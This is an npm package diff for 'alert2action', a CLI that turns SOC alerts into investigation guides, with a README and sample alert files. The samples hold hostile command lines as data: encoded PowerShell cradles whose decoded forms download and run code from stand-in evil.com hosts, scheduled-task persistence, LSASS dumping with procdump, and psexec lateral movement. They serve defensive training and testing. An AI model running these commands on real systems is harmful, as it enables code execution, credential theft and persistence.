alert2action 1.0.0

package/README.md

@@ -0,0 +1,203 @@
+# alert2action
+
+> **SOC Alert → Investigation Guide CLI**
+
+Transform security alerts into actionable investigation guides with MITRE ATT&CK mapping, investigation commands, and containment playbooks.
+
+![alert2action demo](https://img.shields.io/badge/SOC-Automation-blue) ![Node.js](https://img.shields.io/badge/node-%3E%3D14.0.0-green) ![License](https://img.shields.io/badge/license-MIT-brightgreen)
+
+## 🎯 What It Does
+
+```bash
+alert2action alert.json
+```
+
+**Input:** A security alert JSON file (from any SIEM, EDR, or security tool)
+
+**Output:** A comprehensive investigation guide with:
+- 📖 **What Happened** - Plain-English summary
+- 🎯 **MITRE ATT&CK Mapping** - Matched techniques with confidence scores
+- 📁 **Logs to Check** - Relevant log sources for investigation
+- ⚡ **Commands to Run** - PowerShell & Linux commands for analysis
+- 🛡️ **Containment Steps** - Prioritized response actions
+- 🤔 **False Positive Hints** - Common benign causes to rule out
+
+## 💡 Why This Is GOLD
+
+- ✅ **Helps SOC freshers** - Learn investigation workflow
+- ✅ **Saves senior analyst time** - Skip the basics, focus on threats
+- ✅ **No strong open-source competitor** - Fills a real gap
+- ✅ **Works with any SIEM** - Normalizes different alert formats
+- ✅ **Offline capable** - No API keys needed
+
+## 🚀 Quick Start
+
+### Installation via npm (Recommended)
+
+```bash
+npm install -g alert2action
+```
+
+### Or Clone from GitHub
+
+```bash
+git clone https://github.com/notsointresting/alert2action.git
+cd alert2action
+npm install
+npm link  # Makes it globally available
+```
+
+### Run on an Example Alert
+
+```bash
+alert2action examples/brute-force-alert.json
+# or
+node bin/alert2action.js examples/brute-force-alert.json
+```
+
+## 📋 Usage
+
+### Basic Usage
+
+```bash
+alert2action <alert-file.json>
+```
+
+### Options
+
+```bash
+alert2action alert.json            # Colored CLI output
+alert2action alert.json -o json    # JSON format
+alert2action alert.json -o markdown # Markdown for tickets
+alert2action alert.json -v         # Verbose mode
+alert2action --help                # Show help
+```
+
+### Output Formats
+
+- **text** (default) - Colorized CLI output for terminal
+- **json** - Raw JSON for integration with other tools
+- **markdown** - Perfect for pasting into tickets/docs
+
+## 📁 Supported Alert Formats
+
+alert2action automatically normalizes alerts from various sources:
+
+- **Generic JSON** - Any custom format
+- **Splunk** - Splunk alert output
+- **Microsoft Sentinel** - Azure Sentinel incidents
+- **Elastic SIEM** - Elasticsearch alerts
+- **CrowdStrike Falcon** - Falcon detection events
+- **Microsoft Defender** - MDE/MDI alerts
+- **Custom SIEM** - Maps common field names automatically
+
+### Example Alert Structure
+
+```json
+{
+  "title": "Multiple Failed Login Attempts",
+  "severity": "high",
+  "timestamp": "2024-01-18T10:30:00Z",
+  "source_ip": "185.220.101.45",
+  "hostname": "DC01.corp.local",
+  "username": "administrator",
+  "description": "Over 50 failed login attempts detected"
+}
+```
+
+## 🎯 MITRE ATT&CK Coverage
+
+Currently maps to **21 techniques** across all major tactics:
+
+| Tactic | Techniques |
+|--------|------------|
+| Reconnaissance | T1595 (Active Scanning) |
+| Initial Access | T1566 (Phishing), T1190 (Exploit), T1078 (Valid Accounts) |
+| Execution | T1059 (Command/Script), T1059.001 (PowerShell) |
+| Persistence | T1053 (Scheduled Task), T1547 (Boot Autostart) |
+| Privilege Escalation | T1548.002 (UAC Bypass), T1134 (Token Manipulation) |
+| Defense Evasion | T1055 (Process Injection), T1070 (Indicator Removal) |
+| Credential Access | T1003 (Credential Dumping), T1110 (Brute Force) |
+| Discovery | T1087 (Account Discovery) |
+| Lateral Movement | T1021 (Remote Services) |
+| Command & Control | T1071 (Application Protocol) |
+| Exfiltration | T1041 (Exfil Over C2) |
+| Impact | T1486 (Ransomware) |
+
+## 📂 Example Alerts Included
+
+Try these sample alerts in the `examples/` folder:
+
+```bash
+# Brute force attack
+node bin/alert2action.js examples/brute-force-alert.json
+
+# Malware execution (PowerShell download cradle)
+node bin/alert2action.js examples/malware-alert.json
+
+# Phishing email
+node bin/alert2action.js examples/phishing-alert.json
+
+# Credential dumping (LSASS access)
+node bin/alert2action.js examples/credential-dump-alert.json
+
+# Lateral movement (PsExec)
+node bin/alert2action.js examples/lateral-movement-alert.json
+
+# Privilege escalation (UAC Bypass)
+node bin/alert2action.js examples/privesc-alert.json
+
+# Multi-stage attack (Encoded PS + C2 + Persistence)
+node bin/alert2action.js examples/soc-test-alert.json
+```
+
+## 🛠️ Programmatic Usage
+
+Use alert2action as a library in your own scripts:
+
+```javascript
+const { analyze, parseAlert, generateGuide } = require('alert2action');
+
+// Quick analysis
+const alertJson = require('./my-alert.json');
+console.log(analyze(alertJson));
+
+// Or step by step
+const parsed = parseAlert(alertJson);
+const guide = generateGuide(parsed);
+console.log(guide);
+```
+
+## 🗺️ Roadmap
+
+### Coming Soon
+- [ ] **More MITRE techniques** - Expand to 50+ techniques
+- [ ] **Threat intelligence integration** - VirusTotal, AbuseIPDB, OTX lookups
+- [ ] **Export to TheHive** - Create cases directly from alerts
+- [ ] **Splunk-specific mapping** - Native Splunk field support
+- [ ] **Interactive mode** - Guided Q&A investigation workflow
+- [ ] **Custom playbook templates** - YAML-based playbook definitions
+
+### Future Ideas
+- [ ] Sigma rule suggestions
+- [ ] YARA rule generation
+- [ ] Timeline visualization
+- [ ] Multi-alert correlation
+- [ ] Webhook integrations (Slack, Teams, Discord)
+
+## 🤝 Contributing
+
+Contributions welcome! Areas that need help:
+
+1. **More MITRE techniques** - Add coverage for more attack patterns
+2. **SIEM-specific parsers** - Better support for specific products
+3. **Investigation commands** - More forensic one-liners
+4. **False positive knowledge** - Common FP patterns
+
+## 📄 License
+
+MIT License - Use freely in your SOC!
+
+---
+
+Built with ❤️ for SOC analysts everywhere

package/alert2action.cmd

@@ -0,0 +1,2 @@
+@echo off
+node "%~dp0bin\alert2action.js" %*

package/bin/alert2action.js

@@ -0,0 +1,77 @@
+#!/usr/bin/env node
+
+/**
+ * alert2action CLI
+ * SOC Alert to Investigation Guide Generator
+ * 
+ * Usage: alert2action <alert.json>
+ */
+
+const { program } = require('commander');
+const chalk = require('chalk');
+const fs = require('fs');
+const path = require('path');
+
+const { parseAlert } = require('../src/parser');
+const { generateGuide } = require('../src/guide-generator');
+const { formatOutput } = require('../src/formatter');
+
+// ASCII Banner
+const banner = `
+${chalk.cyan('╔═══════════════════════════════════════════════════════════════╗')}
+${chalk.cyan('║')}  ${chalk.bold.yellow('⚡ ALERT')}${chalk.bold.red('2')}${chalk.bold.green('ACTION')}  ${chalk.gray('- SOC Investigation Guide Generator')}   ${chalk.cyan('║')}
+${chalk.cyan('╚═══════════════════════════════════════════════════════════════╝')}
+`;
+
+program
+  .name('alert2action')
+  .description('Transform SOC alerts into actionable investigation guides')
+  .version('1.0.0')
+  .argument('<alert-file>', 'Path to the alert JSON file')
+  .option('-o, --output <format>', 'Output format: text, json, markdown', 'text')
+  .option('-v, --verbose', 'Show detailed analysis')
+  .option('--no-color', 'Disable colored output')
+  .action((alertFile, options) => {
+    try {
+      // Show banner
+      if (options.color !== false) {
+        console.log(banner);
+      }
+
+      // Validate file exists
+      const filePath = path.resolve(alertFile);
+      if (!fs.existsSync(filePath)) {
+        console.error(chalk.red(`\n❌ Error: File not found: ${alertFile}`));
+        process.exit(1);
+      }
+
+      // Read and parse alert
+      const alertData = fs.readFileSync(filePath, 'utf8');
+      let alert;
+      try {
+        alert = JSON.parse(alertData);
+      } catch (e) {
+        console.error(chalk.red(`\n❌ Error: Invalid JSON in ${alertFile}`));
+        process.exit(1);
+      }
+
+      // Parse and normalize alert
+      const parsedAlert = parseAlert(alert);
+      
+      // Generate investigation guide
+      const guide = generateGuide(parsedAlert);
+      
+      // Format and output
+      const output = formatOutput(guide, options);
+      console.log(output);
+
+    } catch (error) {
+      console.error(chalk.red(`\n❌ Error: ${error.message}`));
+      if (options.verbose) {
+        console.error(error.stack);
+      }
+      process.exit(1);
+    }
+  });
+
+program.parse();

package/examples/brute-force-alert.json

@@ -0,0 +1,33 @@
+{
+    "id": "ALERT-2024-0127",
+    "title": "Multiple Failed Login Attempts Detected",
+    "description": "Over 50 failed authentication attempts detected from a single source IP within 5 minutes, indicating potential brute force attack",
+    "severity": "high",
+    "timestamp": "2024-01-18T10:30:00Z",
+    "source": "Windows Security",
+    "category": "Credential Access",
+    "source_ip": "185.220.101.45",
+    "dest_ip": "10.0.0.50",
+    "dest_port": 3389,
+    "protocol": "RDP",
+    "hostname": "DC01.corp.local",
+    "username": "administrator",
+    "domain": "CORP",
+    "event_type": "Authentication Failure",
+    "action": "blocked",
+    "status": "ongoing",
+    "data": {
+        "failed_attempts": 57,
+        "time_window_minutes": 5,
+        "targeted_accounts": [
+            "administrator",
+            "admin",
+            "svc_backup",
+            "sql_admin"
+        ],
+        "event_ids": [
+            4625,
+            4771
+        ]
+    }
+}

package/examples/credential-dump-alert.json

@@ -0,0 +1,32 @@
+{
+    "id": "ALERT-2024-0130",
+    "title": "LSASS Memory Access Detected - Potential Credential Dumping",
+    "description": "Process attempted to access LSASS memory, behavior consistent with credential harvesting tools like Mimikatz",
+    "severity": "critical",
+    "timestamp": "2024-01-18T16:45:22Z",
+    "source": "CrowdStrike Falcon",
+    "category": "Credential Access",
+    "hostname": "FINANCE-WS05",
+    "username": "SYSTEM",
+    "domain": "CORP",
+    "process_name": "procdump64.exe",
+    "process_path": "C:\\Users\\admin\\Downloads\\procdump64.exe",
+    "process_command_line": "procdump64.exe -accepteula -ma lsass.exe lsass.dmp",
+    "parent_process": "cmd.exe",
+    "process_id": 7234,
+    "source_ip": "10.0.2.105",
+    "data": {
+        "target_process": "lsass.exe",
+        "target_pid": 612,
+        "access_mask": "0x1FFFFF",
+        "technique_indicators": [
+            "credential_dumping",
+            "lsass_access",
+            "memory_dump"
+        ],
+        "tool_signature": "SysInternals ProcDump"
+    },
+    "event_type": "Process Access",
+    "action": "detected",
+    "status": "active"
+}

package/examples/lateral-movement-alert.json

@@ -0,0 +1,29 @@
+{
+    "id": "ALERT-2024-0131",
+    "title": "Suspicious Lateral Movement via PsExec Detected",
+    "description": "Remote execution attempt using PsExec from workstation to domain controller detected",
+    "severity": "high",
+    "timestamp": "2024-01-18T11:08:45Z",
+    "source": "Microsoft Defender for Identity",
+    "category": "Lateral Movement",
+    "source_ip": "10.0.1.155",
+    "dest_ip": "10.0.0.10",
+    "dest_port": 445,
+    "protocol": "SMB",
+    "hostname": "WORKSTATION-089",
+    "username": "admin.jones",
+    "domain": "CORP",
+    "process_name": "PSEXESVC.exe",
+    "process_path": "\\\\DC01\\ADMIN$\\PSEXESVC.exe",
+    "process_command_line": "psexec.exe \\\\DC01 -s cmd.exe",
+    "data": {
+        "source_machine": "WORKSTATION-089",
+        "target_machine": "DC01",
+        "service_created": "PSEXESVC",
+        "authentication_type": "NTLM",
+        "lateral_movement_type": "PsExec"
+    },
+    "event_type": "Remote Execution",
+    "action": "detected",
+    "status": "active"
+}

package/examples/malware-alert-2.json

@@ -0,0 +1,30 @@
+{
+    "id": "ALERT-2024-0140",
+    "title": "Suspicious Scheduled Task Created with Encoded PowerShell",
+    "description": "A new scheduled task was created that executes an obfuscated PowerShell command, potentially establishing persistence",
+    "severity": "high",
+    "timestamp": "2024-01-18T08:15:33Z",
+    "source": "Microsoft Defender for Endpoint",
+    "category": "Persistence",
+    "hostname": "HR-LAPTOP-023",
+    "username": "jdoe",
+    "domain": "CORP",
+    "process_name": "schtasks.exe",
+    "process_path": "C:\\Windows\\System32\\schtasks.exe",
+    "process_command_line": "schtasks /create /tn \"WindowsUpdate\" /tr \"powershell.exe -WindowStyle Hidden -EncodedCommand JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgTgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAMgAuAGUAdgBpAGwALgBjAG8AbQAvAGIAZQBhAGMAbwBuAC4AZQB4AGUAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAagBkAG8AZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdQBwAGQAYQB0AGUALgBlAHgAZQAnACkA\" /sc onlogon /ru SYSTEM",
+    "parent_process": "cmd.exe",
+    "process_id": 8844,
+    "source_ip": "10.0.5.23",
+    "dest_ip": "45.33.32.156",
+    "dest_port": 80,
+    "data": {
+        "task_name": "WindowsUpdate",
+        "task_trigger": "OnLogon",
+        "run_as": "SYSTEM",
+        "decoded_command": "$c=New-Object Net.WebClient;$c.DownloadFile('http://c2.evil.com/beacon.exe','C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe')",
+        "external_connection": true
+    },
+    "event_type": "Scheduled Task Creation",
+    "action": "detected",
+    "status": "active"
+}

package/examples/malware-alert.json

@@ -0,0 +1,35 @@
+{
+    "id": "ALERT-2024-0128",
+    "title": "Suspicious PowerShell Execution with Encoded Command",
+    "description": "PowerShell executed with Base64 encoded command attempting to download and execute content from external URL",
+    "severity": "critical",
+    "timestamp": "2024-01-18T14:22:15Z",
+    "source": "Microsoft Defender for Endpoint",
+    "category": "Execution",
+    "hostname": "WORKSTATION-042",
+    "username": "jsmith",
+    "domain": "CORP",
+    "process_name": "powershell.exe",
+    "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+    "process_command_line": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAG0AYQBsAHcAYQByAGUALgBlAHYAaQBsAC4AYwBvAG0ALwBwAGEAeQBsAG8AYQBkAC4AcABzADEAJwApAA==",
+    "parent_process": "WINWORD.EXE",
+    "process_id": 4892,
+    "source_ip": "10.0.1.42",
+    "dest_ip": "23.94.123.87",
+    "dest_port": 443,
+    "file_hash": "a1b2c3d4e5f6789012345678901234567890abcd",
+    "data": {
+        "decoded_command": "IEX(New-Object Net.WebClient).DownloadString('http://malware.evil.com/payload.ps1')",
+        "parent_command_line": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\jsmith\\Downloads\\Invoice_12345.docm\"",
+        "network_connections": [
+            {
+                "dest": "malware.evil.com",
+                "port": 80
+            },
+            {
+                "dest": "23.94.123.87",
+                "port": 443
+            }
+        ]
+    }
+}

package/examples/phishing-alert.json

@@ -0,0 +1,28 @@
+{
+    "id": "ALERT-2024-0129",
+    "title": "Phishing Email with Malicious Attachment Detected",
+    "description": "Email containing suspicious Office document with macro detected and quarantined",
+    "severity": "medium",
+    "timestamp": "2024-01-18T09:15:30Z",
+    "source": "Microsoft Defender for Office 365",
+    "category": "Initial Access",
+    "hostname": "MAIL-GW01",
+    "username": "mwilliams@company.com",
+    "data": {
+        "sender_email": "invoice@secure-payment-portal.com",
+        "sender_ip": "192.168.45.23",
+        "recipient": "mwilliams@company.com",
+        "subject": "URGENT: Invoice #INV-2024-8872 - Payment Required",
+        "attachment_name": "Invoice_Details_2024.xlsm",
+        "attachment_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
+        "has_macro": true,
+        "links_in_body": [
+            "http://malicious-link.com/track/12345"
+        ],
+        "verdict": "Phishing",
+        "action_taken": "Quarantined"
+    },
+    "event_type": "Email Threat",
+    "action": "quarantined",
+    "status": "contained"
+}

package/examples/privesc-alert.json

@@ -0,0 +1,112 @@
+{
+    "event_version": "2.1",
+    "event_id": "privesc-3c91a8f2-4e67-4b2f-bb8a-91aef3d27b11",
+    "event_type": "privilege_escalation",
+    "event_severity": "critical",
+    "event_status": "active",
+    "event_time": "2026-01-18T09:41:12.556Z",
+    "ingested_time": "2026-01-18T09:41:14.102Z",
+    "host": {
+        "hostname": "FINANCE-LAPTOP-014",
+        "host_id": "e92b1c14-12a3-4d8b-9f81-7c88a1b27b45",
+        "ip_address": "10.0.8.47",
+        "os": {
+            "name": "Windows 11 Enterprise",
+            "version": "23H2",
+            "build": "22631.3085"
+        }
+    },
+    "user": {
+        "original_user": "jdoe",
+        "original_privilege": "standard_user",
+        "escalated_user": "NT AUTHORITY\\SYSTEM",
+        "logon_type": "service",
+        "session_id": "0x3e7"
+    },
+    "process": {
+        "process_name": "cmd.exe",
+        "process_id": 5236,
+        "parent_process": "winlogon.exe",
+        "parent_process_id": 732,
+        "command_line": "cmd.exe /c whoami",
+        "integrity_level": "System",
+        "token_elevation": true
+    },
+    "privilege_change": {
+        "method": "UAC Bypass",
+        "technique_details": "Abuse of auto-elevated COM interface",
+        "success": true,
+        "previous_integrity_level": "Medium",
+        "new_integrity_level": "System"
+    },
+    "exploitation": {
+        "vector": "Local",
+        "exploit_name": "SilentCleanup UAC Bypass",
+        "cve": null,
+        "exploited_component": "Task Scheduler / COM Interface"
+    },
+    "file_activity": {
+        "suspicious_binary": "payload.exe",
+        "file_path": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\payload.exe",
+        "hashes": {
+            "md5": "9e107d9d372bb6826bd81d3542a419d6",
+            "sha256": "6a2da5b9a21dfd7c83e28efc6c6fd4d4a7c3fdafad7c5f3f4c87bb1ad9d4f223"
+        }
+    },
+    "persistence": {
+        "mechanism": "Service Creation",
+        "service_name": "WindowsUpdateHelper",
+        "service_binary": "C:\\ProgramData\\WindowsUpdateHelper\\wuhelper.exe",
+        "start_type": "auto"
+    },
+    "mitre_attack": {
+        "tactic": "Privilege Escalation",
+        "techniques": [
+            {
+                "id": "T1548.002",
+                "name": "Bypass User Account Control"
+            },
+            {
+                "id": "T1134",
+                "name": "Access Token Manipulation"
+            },
+            {
+                "id": "T1059.003",
+                "name": "Windows Command Shell"
+            }
+        ]
+    },
+    "detection": {
+        "source": "EDR",
+        "rule_name": "Suspicious SYSTEM-Level Process Spawn",
+        "confidence": 0.94,
+        "indicators": [
+            "standard_user_to_SYSTEM",
+            "unexpected_SYSTEM_shell",
+            "auto_elevated_process"
+        ]
+    },
+    "response": {
+        "actions_taken": [
+            "process_terminated",
+            "service_disabled",
+            "file_quarantined",
+            "host_isolated"
+        ],
+        "isolation_status": "enabled",
+        "analyst_notified": true
+    },
+    "analyst_notes": {
+        "assigned_to": "soc_analyst_l2",
+        "summary": "Privilege escalation achieved via UAC bypass. SYSTEM shell spawned from standard user context. Persistence established through rogue service."
+    },
+    "ioc": {
+        "host": "FINANCE-LAPTOP-014",
+        "user": "jdoe",
+        "process": "payload.exe",
+        "service": "WindowsUpdateHelper",
+        "hashes": [
+            "6a2da5b9a21dfd7c83e28efc6c6fd4d4a7c3fdafad7c5f3f4c87bb1ad9d4f223"
+        ]
+    }
+}

package/examples/soc-test-alert.json

@@ -0,0 +1,80 @@
+{
+    "event_id": "test-001",
+    "event_type": "security_alert",
+    "severity": "high",
+    "status": "active",
+    "timestamp": "2026-01-18T12:30:45Z",
+    "host": {
+        "hostname": "TEST-ENDPOINT-01",
+        "ip": "10.0.10.15",
+        "os": "Windows 10"
+    },
+    "user": {
+        "username": "testuser",
+        "role": "standard_user"
+    },
+    "process": {
+        "name": "powershell.exe",
+        "parent": "cmd.exe",
+        "command_line": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANAA1AC4AMwAzAC4AMwAyAC4AMQA1ADYALwAnACkA"
+    },
+    "network": {
+        "destination_ip": "45.33.32.156",
+        "destination_port": 443,
+        "protocol": "HTTPS",
+        "reputation": "malicious"
+    },
+    "persistence": {
+        "method": "Scheduled Task",
+        "name": "WindowsUpdateService"
+    },
+    "privilege_escalation": {
+        "attempted": true,
+        "new_privilege": "SYSTEM"
+    },
+    "mitre_attack": {
+        "tactics": [
+            "Execution",
+            "Persistence",
+            "Privilege Escalation",
+            "Command and Control"
+        ],
+        "techniques": [
+            {
+                "id": "T1059.001",
+                "name": "PowerShell"
+            },
+            {
+                "id": "T1053",
+                "name": "Scheduled Task"
+            },
+            {
+                "id": "T1548.002",
+                "name": "UAC Bypass"
+            },
+            {
+                "id": "T1071.001",
+                "name": "Web Protocols"
+            }
+        ]
+    },
+    "ioc": {
+        "ips": [
+            "45.33.32.156"
+        ],
+        "processes": [
+            "powershell.exe"
+        ],
+        "users": [
+            "testuser"
+        ]
+    },
+    "response": {
+        "recommended_actions": [
+            "isolate_host",
+            "terminate_process",
+            "delete_scheduled_task",
+            "block_ip"
+        ]
+    }
+}